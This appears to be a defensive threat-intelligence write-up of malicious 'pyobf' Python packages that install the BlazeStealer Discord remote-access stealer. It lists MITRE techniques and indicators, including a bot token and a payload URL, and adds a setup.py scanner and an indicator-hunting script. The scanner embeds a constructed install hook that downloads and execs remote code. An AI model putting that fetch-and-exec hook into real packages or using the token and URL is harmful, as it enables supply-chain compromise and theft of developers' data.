Attackers published malicious Python packages masquerading as obfuscation tools that execute code at install time and fetch a secondary payload called BlazeStealer. The payload runs a Discord-based remote-access bot that enables data theft, keylogging, webcam capture, file encryption, and disabling of defenses. #BlazeStealer #pyobfgood

Keypoints

  • Multiple fake Python obfuscation packages (names beginning with “pyobf”, e.g., pyobfgood) were uploaded to the Python package index and install malicious code.
  • The packages contain code in setup.py and __init__.py that executes during installation and downloads additional Python code from an external server.
  • The fetched payload, dubbed BlazeStealer, runs as a Discord bot (hardcoded token) and gives the attacker full remote control of the host.
  • BlazeStealer capabilities include exfiltrating system info, stealing Chrome passwords, installing a keylogger, downloading files, capturing screenshots and recording screen/audio, and webcam photo capture via a downloaded utility.
  • Attackers can also disable Windows Defender/Task Manager, force high CPU or BSOD, add startup scripts, execute arbitrary commands, and encrypt files (ransom potential).
  • Developers who perform obfuscation are high-value targets because they often handle sensitive code and secrets.
  • IOCs published include the Discord token, transfer.sh payload URL, and the WebCamImageSave download URL.

MITRE Techniques

  • [T1195] Supply Chain Compromise – Malicious packages were published to the Python ecosystem that execute code during installation (“…setup.py and __init__.py files of the package contain a script that is activated upon package installation which receives and executes code from an external source”).
  • [T1105] Ingress Tool Transfer – The installer downloads and runs an additional remote Python payload (“…retrieves an additional malicious script from an external source”).
  • [T1071] Application Layer Protocol – The malware uses Discord as a C2/control channel and presents a bot token to connect (“…runs a Discord bot with the following unique identifier: ‘MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo’”).
  • [T1555.003] Credentials from Web Browsers – The payload explicitly steals stored passwords from Chrome (“…Steal passwords from the Chrome web browser”).
  • [T1056.001] Input Capture: Keylogging – The malware sets up a keylogger to capture user keystrokes (“…set up a keylogger”).
  • [T1082] System Information Discovery – The actor exfiltrates detailed host information for reconnaissance (“…Exfiltrate detailed host information”).
  • [T1041] Exfiltration Over C2 Channel – Data and images are sent back to the attacker via the Discord channel and other remote endpoints (“…The resulting image is then sent back to the Discord channel”).
  • [T1547] Boot or Logon Autostart Execution – The malware adds a batch script to the startup directory to run destructive actions on boot (“…inserting a batch script in the startup directory to shut down the PC”).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – The payload deactivates Windows Defender and Task Manager to avoid detection (“…Deactivate Windows Defender and Task Manager”).
  • [T1486] Data Encrypted for Impact – The malware can encrypt files, indicating ransomware-style impact (“…Encrypt files, potentially for ransom”).

Indicators of Compromise

  • [Malicious package names] package distribution – pyobfgood, pyobftoexe (and several other “pyobf*” packages).
  • [Discord bot token] C2 identifier – MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo
  • [Remote payload URL] fetched installer/script – hxxps://transfer[.]sh/get/wDK3Q8WOA9/start[.]py (downloads the BlazeStealer script)
  • [Utility download URL] webcam capture tool – hxxps://www[.]nirsoft[.]net/utils/webcamimagesave.zip (used to fetch and run WebCamImageSave.exe for webcam capture; WebCamImageSave is a legitimate NirSoft utility, so this URL on its own is a weak indicator and should be correlated with the transfer.sh fetch or the bot token)
  • [Filename] payload and tools – start.py, WebCamImageSave.exe (and other downloaded binaries/scripts)

Malicious “pyobf*” packages embed executable code in setup.py and the package __init__.py that runs automatically during installation; this installer contacts a remote URL (e.g., transfer[.]sh/get/…/start.py) to download and execute a secondary Python payload. That secondary payload, BlazeStealer, connects to a Discord channel using a hardcoded bot token and uses the channel as its command-and-control path, which gives the operator remote command execution and a data-transfer route over ordinary HTTPS to a widely allowed domain.
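The install-time fetch-then-execute behaviour described above is something a package reviewer can check for statically before `pip install` ever runs. The following is an added example (not code from the Checkmarx write-up or from the pyobf* packages): it parses setup.py / __init__.py, records every network, exec, shell, decode and setuptools install-hook site, and returns a verdict. The two sample sources, the placeholder URL and the package names are constructed for this example and are only parsed, never executed.

```python
"""Static check for the install-time fetch-then-execute pattern in setup.py / __init__.py.

Added example, not code from the Checkmarx write-up or from the pyobf* packages.
The two sample sources, the placeholder URL and the package names are constructed;
the scanner only parses them and never runs them.
"""
import ast
from dataclasses import dataclass

# Call-name suffixes that usually mean "reach out over the network" ...
NETWORK = ("urlopen", "urlretrieve", "requests.get", "requests.post", "httpx.get")
# ... "run what you were given" ...
EXEC = {"exec", "eval"}
SHELL = ("subprocess.run", "subprocess.Popen", "subprocess.call",
         "subprocess.check_output", "os.system", "os.popen")
# ... and "hide what you are doing" (obfuscation is the theme of these packages).
DECODE = ("b64decode", "a85decode", "bytes.fromhex", "zlib.decompress")
# setuptools command classes whose run() executes during `pip install`.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py"}


@dataclass
class Finding:
    kind: str
    detail: str
    lineno: int


def dotted_name(func):
    """'a.b.c' for a Name/Attribute chain such as urllib.request.urlopen, else None."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src, filename="setup.py"):
    """Walk the AST and record every network, exec, shell, decode and install-hook site."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if isinstance(node, ast.ClassDef):
            # class X(install) / class X(setuptools.command.install.install)
            hooked = {b for b in map(dotted_name, node.bases)
                      if b and b.rsplit(".", 1)[-1] in INSTALL_HOOKS}
            if hooked:
                findings.append(Finding("install_hook",
                                        f"class {node.name} overrides {', '.join(sorted(hooked))}",
                                        node.lineno))
        elif isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name is None:
                continue
            if name in EXEC:
                findings.append(Finding("exec", name, node.lineno))
            elif name.endswith(NETWORK):
                findings.append(Finding("network", name, node.lineno))
            elif name.endswith(SHELL):
                findings.append(Finding("shell", name, node.lineno))
            elif name.endswith(DECODE):
                findings.append(Finding("decode", name, node.lineno))
            elif name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append(Finding("install_hook",
                                        "setup(cmdclass=...) replaces an install command",
                                        node.lineno))
    return findings


def verdict(findings):
    """Fetch-then-run is the reported pattern; either half alone only warrants review."""
    kinds = {f.kind for f in findings}
    if "network" in kinds and kinds & {"exec", "shell"}:
        return "BLOCK"
    if kinds & {"network", "exec", "shell", "install_hook"}:
        return "REVIEW"
    return "OK"


# Constructed samples: a look-alike of the reported behaviour and a benign setup.py.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        code = urllib.request.urlopen("https://example.invalid/start.py").read()
        exec(code)

setup(name="pyobf-lookalike", version="0.1", cmdclass={"install": PostInstall})
'''

BENIGN_SETUP = '''
from setuptools import setup
setup(name="harmless", version="1.0", packages=["harmless"])
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        found = scan_source(src)
        print(label, verdict(found), [(f.kind, f.detail, f.lineno) for f in found])
```

Name matching like this is a triage aid, not a guarantee: a package that is itself obfuscated (the very thing these packages advertise) can hide the call names. The stronger control is to never run setup.py on the installing host at all, which is what `pip install --only-binary=:all:` together with `--require-hashes` achieves when a pinned wheel is available.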

Once active, BlazeStealer performs reconnaissance and collection (system information, Chrome-stored passwords), installs input-capture mechanisms (keylogger), and provides file operations (download, exfiltrate). It can capture screenshots and audio, download a zipped utility to execute WebCamImageSave.exe to take webcam photos and upload them to the attacker-controlled Discord channel, then remove downloaded artifacts to reduce traces.

For persistence and impact, the malware can add startup batch scripts, disable Windows Defender and Task Manager, drive CPU usage up, trigger a BSOD from Python, execute arbitrary commands, and encrypt files for potential ransom. Detection should block the listed URLs at the egress proxy and hunt for the bot token string in process memory, scripts and network captures (a token cannot be “blocked” at the perimeter because Discord itself is usually allowed). Mitigation should verify package provenance before installation, pin versions together with hashes, and prefer wheels so that setup.py never executes on the installing host; a package that needs to download code during `pip install` is itself a red flag, so installer-time network fetches from build and developer machines should be denied or at least alerted on.
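The indicators listed above can be hunted for directly in proxy logs, sandbox captures or memory strings. The following is an added example, not code from the Checkmarx post or from the malware: it refangs the published URLs, matches them against lines of text, and, going beyond the exact token, recognises the general three-segment shape of a Discord bot token and decodes the bot's user id (and its creation date) from the first segment, which lets you attribute a token you have not seen before. The sample log lines are constructed for this example.

```python
"""Hunt for the published BlazeStealer IOCs in log or text lines.

Added example, not from the Checkmarx post or from the malware. The indicators
are the ones published in the report (defanged as listed, refanged for matching);
the sample lines below are constructed.
"""
import base64
import re
from datetime import datetime, timezone

IOCS_DEFANGED = {
    "hxxps://transfer[.]sh/get/wDK3Q8WOA9/start[.]py": "BlazeStealer stage-2 download",
    "hxxps://www[.]nirsoft[.]net/utils/webcamimagesave.zip":
        "WebCamImageSave fetch (legitimate NirSoft tool; weak on its own)",
}
KNOWN_TOKEN = "MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo"

# A Discord bot token is three dot-separated base64url segments:
# base64url(bot user id) . base64url(timestamp) . HMAC.  Segment lengths are approximate.
TOKEN_RE = re.compile(
    r"(?<![A-Za-z0-9_-])[A-Za-z0-9_-]{23,28}\.[A-Za-z0-9_-]{6,7}\.[A-Za-z0-9_-]{27,}(?![A-Za-z0-9_-])"
)
DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, the snowflake epoch


def refang(ioc):
    """Undo the hxxp / [.] defanging used in published IOC lists."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


IOC_URLS = {refang(k): v for k, v in IOCS_DEFANGED.items()}


def token_user_id(token):
    """The first token segment is base64url of the bot's user id as a decimal string."""
    first = token.split(".")[0]
    first += "=" * (-len(first) % 4)          # restore stripped padding
    return int(base64.urlsafe_b64decode(first).decode("ascii"))


def snowflake_time(snowflake):
    """Creation time embedded in a Discord snowflake id (upper 42 bits, ms since epoch)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def scan_line(line):
    """Return (kind, indicator, description) tuples for every IOC hit in one line."""
    hits = []
    for url, desc in IOC_URLS.items():
        if url in line:
            hits.append(("url", url, desc))
    for m in TOKEN_RE.finditer(line):
        tok = m.group(0)
        try:
            uid = token_user_id(tok)
        except (ValueError, UnicodeDecodeError):
            continue                           # right shape, but not a bot token
        label = "published BlazeStealer token" if tok == KNOWN_TOKEN else "unrecognised bot token"
        hits.append(("token", tok,
                     f"{label}; bot user id {uid} created {snowflake_time(uid):%Y-%m-%d}"))
    return hits


def scan_lines(lines):
    """(line index, hits) for every line that matched at least one indicator."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := scan_line(line))]


# Constructed sample lines: two proxy entries, one memory-strings entry, one clean entry.
SAMPLE_LINES = [
    "2023-11-02T09:14:03Z dev-ws-07 python GET https://transfer.sh/get/wDK3Q8WOA9/start.py 200",
    "2023-11-02T09:14:05Z dev-ws-07 python GET https://www.nirsoft.net/utils/webcamimagesave.zip 200",
    "strings dev-ws-07 python.exe: Bot " + KNOWN_TOKEN,
    "2023-11-02T09:20:41Z dev-ws-12 pip GET https://pypi.org/simple/requests/ 200",
]

if __name__ == "__main__":
    for idx, hits in scan_lines(SAMPLE_LINES):
        for kind, indicator, desc in hits:
            print(f"line {idx}: {kind} {indicator} -> {desc}")
```

Decoding the user id is what makes the token-shape rule worth having: any three-segment string whose first part does not decode to a decimal id is discarded, and for a genuine token the id and its creation date are enough to pivot on even when the HMAC part differs from the published sample.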

Read more: https://checkmarx.com/blog/python-obfuscation-traps/